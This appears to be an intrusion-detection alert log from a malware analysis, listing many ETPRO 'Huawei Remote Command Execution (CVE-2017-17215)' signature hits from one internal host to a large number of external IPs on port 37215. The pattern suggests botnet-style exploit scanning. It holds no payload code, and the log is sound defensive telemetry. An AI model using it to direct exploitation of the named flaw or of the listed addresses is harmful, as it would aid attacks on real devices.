                                                        06/13/24-21:32:05.346648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3397437215192.168.2.14197.167.133.155
                                                        06/13/24-21:33:02.954515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5171037215192.168.2.1441.125.167.214
                                                        06/13/24-21:33:13.213392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4440437215192.168.2.14197.185.161.37
                                                        06/13/24-21:33:07.042545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4314437215192.168.2.1441.0.249.3
                                                        06/13/24-21:32:36.247730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4090037215192.168.2.1441.56.54.149
                                                        06/13/24-21:32:48.555858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5886037215192.168.2.14197.156.15.253
                                                        06/13/24-21:31:57.094157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3462437215192.168.2.1441.57.153.43
                                                        06/13/24-21:32:40.354477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5217837215192.168.2.14156.92.218.148
                                                        06/13/24-21:32:54.727208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4653037215192.168.2.14156.168.37.28
                                                        06/13/24-21:32:50.610400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5201837215192.168.2.1441.200.58.163
                                                        06/13/24-21:32:09.460237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4458437215192.168.2.14156.115.192.155
                                                        06/13/24-21:31:57.134430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3906837215192.168.2.1441.221.78.125
                                                        06/13/24-21:33:05.011269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5101837215192.168.2.14156.85.230.199
                                                        06/13/24-21:32:09.456966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4175237215192.168.2.1441.232.190.165
                                                        06/13/24-21:32:05.344267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4335037215192.168.2.1441.164.8.152
                                                        06/13/24-21:32:48.571851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5458437215192.168.2.14156.202.72.104
                                                        06/13/24-21:32:32.151621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6000237215192.168.2.14197.140.255.176
                                                        06/13/24-21:32:30.094845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5203437215192.168.2.14197.18.28.239
                                                        06/13/24-21:31:59.174752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4175837215192.168.2.1441.134.28.73
                                                        06/13/24-21:32:30.077653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3364637215192.168.2.1441.156.115.13
                                                        06/13/24-21:32:05.349890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3954037215192.168.2.14156.212.33.219
                                                        06/13/24-21:33:00.869088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5504837215192.168.2.1441.152.8.19
                                                        06/13/24-21:32:21.787718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6043637215192.168.2.1441.77.153.250
                                                        06/13/24-21:31:57.135911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5012237215192.168.2.1441.75.255.42
                                                        06/13/24-21:33:15.275726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4242837215192.168.2.1441.67.104.234
                                                        06/13/24-21:33:15.255895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4252037215192.168.2.14156.202.5.207
                                                        06/13/24-21:32:05.345802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3644437215192.168.2.14197.10.129.158
                                                        06/13/24-21:32:05.377851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4006437215192.168.2.1441.215.109.182
                                                        06/13/24-21:32:58.824451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5725637215192.168.2.14197.69.14.34
                                                        06/13/24-21:32:50.611125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4413437215192.168.2.14156.121.118.192
                                                        06/13/24-21:32:42.407594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5785637215192.168.2.14156.107.225.158
                                                        06/13/24-21:33:11.176156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6092037215192.168.2.1441.59.250.83
                                                        06/13/24-21:32:48.554804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4813437215192.168.2.14156.132.58.85
                                                        06/13/24-21:33:13.230114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5775437215192.168.2.14156.154.52.164
                                                        06/13/24-21:32:40.374173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4909237215192.168.2.1441.76.184.97
                                                        06/13/24-21:31:57.132273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5215237215192.168.2.14197.92.186.40
                                                        06/13/24-21:32:38.316042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6032437215192.168.2.1441.229.53.241
                                                        06/13/24-21:33:11.157111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5139837215192.168.2.1441.98.61.4
                                                        06/13/24-21:33:04.989823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4824637215192.168.2.1441.5.241.191
                                                        06/13/24-21:32:40.353261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3974637215192.168.2.1441.91.200.42
                                                        06/13/24-21:32:13.546537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3283437215192.168.2.14197.167.47.11
                                                        06/13/24-21:31:57.093957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4722037215192.168.2.1441.11.9.160
                                                        06/13/24-21:32:15.610843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4303037215192.168.2.14197.39.142.42
                                                        06/13/24-21:33:07.057286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3945837215192.168.2.14156.179.196.8
                                                        06/13/24-21:31:57.135509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4921037215192.168.2.1441.47.228.86
                                                        06/13/24-21:33:13.212017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3464437215192.168.2.1441.151.201.86
                                                        06/13/24-21:32:01.222065TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3530837215192.168.2.14156.208.31.66
                                                        06/13/24-21:32:17.696398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5107237215192.168.2.1441.104.146.206
                                                        06/13/24-21:32:21.784535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5689437215192.168.2.14197.219.48.128
                                                        06/13/24-21:33:00.872200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3637837215192.168.2.1441.155.135.229
                                                        06/13/24-21:33:09.128685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5806237215192.168.2.14197.133.232.14
                                                        06/13/24-21:32:50.612499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4654637215192.168.2.14197.211.8.198
                                                        06/13/24-21:32:34.214388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5413837215192.168.2.1441.168.235.140
                                                        06/13/24-21:32:25.997365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3961037215192.168.2.14156.2.77.10
                                                        06/13/24-21:33:13.213677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3344037215192.168.2.1441.189.103.84
                                                        06/13/24-21:32:52.659622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3622037215192.168.2.14197.42.99.2
                                                        06/13/24-21:32:01.238209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5485237215192.168.2.14197.158.97.75
                                                        06/13/24-21:33:13.213781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5945637215192.168.2.1441.255.53.8
                                                        06/13/24-21:32:36.243280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5032437215192.168.2.14156.233.97.117
                                                        06/13/24-21:32:56.754069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3831437215192.168.2.14197.168.242.23
                                                        06/13/24-21:32:11.488500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3941837215192.168.2.14156.134.25.37
                                                        06/13/24-21:32:38.323966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3633237215192.168.2.1441.191.106.68
                                                        06/13/24-21:33:13.214157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3592637215192.168.2.14197.241.17.170
                                                        06/13/24-21:33:13.229512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503237215192.168.2.1441.21.220.163
                                                        06/13/24-21:32:15.606386TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3584837215192.168.2.14197.74.223.221
                                                        06/13/24-21:32:13.544391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5554637215192.168.2.1441.89.87.79
                                                        06/13/24-21:32:15.609950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5083237215192.168.2.1441.168.48.220
                                                        06/13/24-21:32:17.676065TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4933237215192.168.2.14197.41.30.228
                                                        06/13/24-21:32:28.043762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4930837215192.168.2.1441.114.51.213
                                                        06/13/24-21:32:30.123344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5937837215192.168.2.1441.218.24.192
                                                        06/13/24-21:33:07.057700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4704437215192.168.2.1441.172.218.208
                                                        06/13/24-21:32:21.805739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4564437215192.168.2.14156.194.137.223
                                                        06/13/24-21:33:17.341060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3906237215192.168.2.1441.45.53.10
                                                        06/13/24-21:32:48.551720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4882637215192.168.2.14156.173.173.44
                                                        06/13/24-21:33:17.309768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5166837215192.168.2.14197.212.6.153
                                                        06/13/24-21:32:23.937764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4328637215192.168.2.1441.133.252.82
                                                        06/13/24-21:33:15.273921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5926637215192.168.2.14156.188.212.91
                                                        06/13/24-21:31:57.092881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4561437215192.168.2.14197.107.159.226
                                                        06/13/24-21:32:38.322088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4430437215192.168.2.14197.212.81.79
                                                        06/13/24-21:32:21.787667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5193037215192.168.2.14156.62.216.71
                                                        06/13/24-21:32:40.373473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5252437215192.168.2.14156.247.55.251
                                                        06/13/24-21:32:32.168696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4896637215192.168.2.14197.219.38.109
                                                        06/13/24-21:32:13.568782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4747837215192.168.2.1441.229.116.226
                                                        06/13/24-21:32:32.153259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4210837215192.168.2.14156.117.115.152
                                                        06/13/24-21:32:34.191099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5311037215192.168.2.14156.76.12.226
                                                        06/13/24-21:33:11.154842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4816837215192.168.2.14197.132.248.52
                                                        06/13/24-21:33:15.257971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5656037215192.168.2.14156.215.161.146
                                                        06/13/24-21:32:40.373919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4386037215192.168.2.1441.224.192.65
                                                        06/13/24-21:33:15.253040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4876637215192.168.2.1441.219.111.77
                                                        06/13/24-21:32:03.307917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5480637215192.168.2.14156.150.237.0
                                                        06/13/24-21:32:42.421291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3785437215192.168.2.14156.55.235.254
                                                        06/13/24-21:31:57.130412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4643037215192.168.2.14156.172.255.70
                                                        06/13/24-21:32:46.503256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4360037215192.168.2.14156.215.72.72
                                                        06/13/24-21:33:11.160337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4175037215192.168.2.1441.101.87.255
                                                        06/13/24-21:32:48.569681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5915837215192.168.2.14197.12.213.71
                                                        06/13/24-21:32:28.048560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3746237215192.168.2.1441.202.103.234
                                                        06/13/24-21:32:52.680290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5299437215192.168.2.14156.100.185.69
                                                        06/13/24-21:32:03.304309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4055437215192.168.2.1441.154.183.230
                                                        06/13/24-21:32:05.376391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3917437215192.168.2.1441.137.58.94
                                                        06/13/24-21:32:17.672413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5754037215192.168.2.1441.92.187.102
                                                        06/13/24-21:33:15.275504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5260037215192.168.2.14156.115.13.54
                                                        06/13/24-21:33:09.110574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4120637215192.168.2.14197.7.72.186
                                                        06/13/24-21:32:52.670732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4256837215192.168.2.14197.212.34.58
                                                        06/13/24-21:31:59.176366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5021037215192.168.2.1441.26.109.199
                                                        06/13/24-21:32:40.353315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5833037215192.168.2.14197.151.17.1
                                                        06/13/24-21:31:59.173929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3493437215192.168.2.14197.2.27.218
                                                        06/13/24-21:32:40.379465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5170837215192.168.2.1441.67.62.213
                                                        06/13/24-21:33:11.172660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5398437215192.168.2.14197.66.7.252
                                                        06/13/24-21:32:42.408377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5058237215192.168.2.1441.149.118.125
                                                        06/13/24-21:32:03.309947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5550837215192.168.2.14197.54.193.190
                                                        06/13/24-21:32:38.320272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4334437215192.168.2.14156.94.226.24
                                                        06/13/24-21:32:48.555944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3603237215192.168.2.14197.136.9.21
                                                        06/13/24-21:32:36.266476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3377237215192.168.2.1441.54.51.41
                                                        06/13/24-21:33:09.108959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3321837215192.168.2.14156.7.243.242
                                                        06/13/24-21:33:11.157851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4977637215192.168.2.14197.199.19.117
                                                        06/13/24-21:32:23.930321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4330837215192.168.2.1441.8.180.28
                                                        06/13/24-21:31:57.093255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4784037215192.168.2.14156.164.225.185
                                                        06/13/24-21:32:19.728346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6087037215192.168.2.14156.124.242.180
                                                        06/13/24-21:33:13.227792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3930437215192.168.2.1441.28.7.250
                                                        06/13/24-21:31:57.153099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3913837215192.168.2.1441.126.99.219
                                                        06/13/24-21:33:09.127874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3336637215192.168.2.14156.189.237.47
                                                        06/13/24-21:32:07.401983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6027437215192.168.2.1441.142.140.222
                                                        06/13/24-21:32:21.803198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4755237215192.168.2.14156.188.199.143
                                                        06/13/24-21:32:48.569334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5595637215192.168.2.1441.0.220.175
                                                        06/13/24-21:32:42.422430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4764237215192.168.2.14197.26.80.39
                                                        06/13/24-21:33:15.271190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6008637215192.168.2.14197.170.100.127
                                                        06/13/24-21:33:11.176092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4362237215192.168.2.14197.80.33.207
                                                        06/13/24-21:32:48.553558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4618637215192.168.2.14156.241.189.204
                                                        06/13/24-21:32:34.198381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5482437215192.168.2.1441.27.14.13
                                                        06/13/24-21:33:09.108057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5827037215192.168.2.14156.202.227.49
                                                        06/13/24-21:32:44.454468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4327237215192.168.2.14197.112.88.208
                                                        06/13/24-21:31:57.131294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4628837215192.168.2.14156.117.58.200
                                                        06/13/24-21:32:38.300443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5274837215192.168.2.14197.131.209.37
                                                        06/13/24-21:32:28.046184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5154437215192.168.2.14156.103.55.38
                                                        06/13/24-21:31:57.094255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5845237215192.168.2.14197.14.227.73
                                                        06/13/24-21:32:23.941078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4109437215192.168.2.1441.194.87.17
                                                        06/13/24-21:32:15.610123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4117037215192.168.2.1441.243.12.231
                                                        06/13/24-21:33:00.871560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5436837215192.168.2.1441.53.88.65
                                                        06/13/24-21:33:02.914322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3433237215192.168.2.14156.166.6.27
                                                        06/13/24-21:32:46.526312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4964037215192.168.2.1441.127.118.174
                                                        06/13/24-21:32:25.992833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4806637215192.168.2.1441.26.197.170
                                                        06/13/24-21:32:36.262682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654437215192.168.2.1441.89.207.121
                                                        06/13/24-21:31:57.092722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4193637215192.168.2.14156.188.19.114
                                                        06/13/24-21:32:30.077850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5540837215192.168.2.1441.114.254.251
                                                        06/13/24-21:32:58.823507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4812837215192.168.2.14197.7.0.148
                                                        06/13/24-21:32:52.669401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3991637215192.168.2.14197.237.146.83
                                                        06/13/24-21:32:30.127869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5587437215192.168.2.14156.165.69.147
                                                        06/13/24-21:33:11.157349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5963637215192.168.2.14197.6.230.206
                                                        06/13/24-21:32:21.804902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6080837215192.168.2.14197.186.46.238
                                                        06/13/24-21:32:25.971960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5394237215192.168.2.14197.34.242.51
                                                        06/13/24-21:32:48.552986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5528037215192.168.2.14197.12.51.169
                                                        06/13/24-21:33:00.872464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5656837215192.168.2.14156.92.21.235
                                                        06/13/24-21:32:40.359895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6003637215192.168.2.1441.82.211.46
                                                        06/13/24-21:32:17.670621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3300437215192.168.2.1441.4.106.202
                                                        06/13/24-21:32:34.194830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5480837215192.168.2.14156.110.129.80
                                                        06/13/24-21:32:56.783823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3822437215192.168.2.1441.139.42.235
                                                        06/13/24-21:33:15.258930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5949437215192.168.2.1441.178.246.224
                                                        06/13/24-21:33:13.210379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4253037215192.168.2.14197.194.121.238
                                                        06/13/24-21:32:30.124340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3290837215192.168.2.1441.217.251.114
                                                        06/13/24-21:32:38.317886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5674837215192.168.2.14197.110.53.34
                                                        06/13/24-21:32:56.753412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3746837215192.168.2.1441.194.61.137
                                                        06/13/24-21:33:09.088728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5295237215192.168.2.14156.177.136.154
                                                        06/13/24-21:32:28.028014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5944837215192.168.2.1441.171.225.188
                                                        06/13/24-21:32:01.239972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4223837215192.168.2.14156.188.13.29
                                                        06/13/24-21:33:07.042942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737437215192.168.2.14197.86.11.196
                                                        06/13/24-21:33:17.310565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5550637215192.168.2.14197.250.49.173
                                                        06/13/24-21:32:42.405015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5737237215192.168.2.14156.8.169.211
                                                        06/13/24-21:32:50.613615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3706037215192.168.2.14197.54.100.120
                                                        06/13/24-21:32:38.323170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5739837215192.168.2.14156.32.135.216
                                                        06/13/24-21:32:34.195820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5994237215192.168.2.14197.200.24.208
                                                        06/13/24-21:33:09.088316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3376637215192.168.2.1441.174.203.97
                                                        06/13/24-21:33:02.911539TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4005237215192.168.2.1441.207.48.129
                                                        06/13/24-21:32:48.554925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4138637215192.168.2.1441.33.54.30
                                                        06/13/24-21:31:59.176617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3696437215192.168.2.1441.39.143.235
                                                        06/13/24-21:32:50.632551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5299637215192.168.2.1441.57.158.143
                                                        06/13/24-21:33:17.340422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618037215192.168.2.1441.242.142.103
                                                        06/13/24-21:32:28.028631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5251037215192.168.2.1441.34.31.226
                                                        06/13/24-21:32:48.554450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4121637215192.168.2.14156.223.10.150
                                                        06/13/24-21:31:59.174711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5109237215192.168.2.1441.86.228.153
                                                        06/13/24-21:32:48.555155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5611037215192.168.2.14156.43.207.94
                                                        06/13/24-21:33:07.056888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5410237215192.168.2.1441.97.238.90
                                                        06/13/24-21:32:28.048209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5216637215192.168.2.14156.188.119.127
                                                        06/13/24-21:32:46.527480TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5241837215192.168.2.14156.187.16.20
                                                        06/13/24-21:32:19.730466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4104237215192.168.2.1441.137.95.75
                                                        06/13/24-21:32:46.524689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5948037215192.168.2.14197.101.220.83
                                                        06/13/24-21:32:05.350608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5904237215192.168.2.1441.151.127.185
